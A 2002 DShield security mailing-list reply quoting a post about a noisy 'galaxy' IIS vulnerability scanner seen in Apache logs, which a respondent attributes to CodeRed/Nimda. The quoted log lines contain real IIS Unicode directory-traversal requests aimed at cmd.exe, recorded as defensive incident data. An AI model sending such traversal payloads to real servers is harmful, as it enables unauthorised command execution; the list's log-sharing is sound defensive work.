[Dshield] Re: Dshield digest, Vol 1 #646 - 2 msgs

checkit checkit at clickdoug.com
Sat Jun 8 02:59:08 GMT 2002


That log file has CodeRed/Nimbda  all over it -  it is looking for check.bat
all over the place.
Are you running apache on a Windows box?

What ever it is, your system is turning it back with a 404 message.





> Message: 2
> Date: Fri, 7 Jun 2002 21:01:48 -0400
> From: Johannes Ullrich <jullrich at sans.org>
> To: list at dshield.org
> Organization: Euclidian Consulting
> Subject: [Dshield] (new?) IIS 'galaxy' vulnerability scanner ?
> Reply-To: list at dshield.org
>
>
> I had today three people notify me about a new, rather noisy, signature
> they found in their apache logs. Can everyone take a look at their logs
> and see if they find it? I don't think this qualifies as a 'worm' so far.
> It looks a bit too complex and overly redundant. But maybe it is some
> vulnerability scanner.
>
> Note the first Line: 'galaxy_10400.10746'. It looks like a marker someone
> added to the tool.
>
>
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "GET /galaxy_10400.10746
> HTTP/1.0" 404 289 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD
> /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0"
> 404 0 "-" "-" "-"
> a.b.c.d - - [06/Jun/2002:15:10:59 +0200] "HEAD

<redundancy snipped>





More information about the list mailing list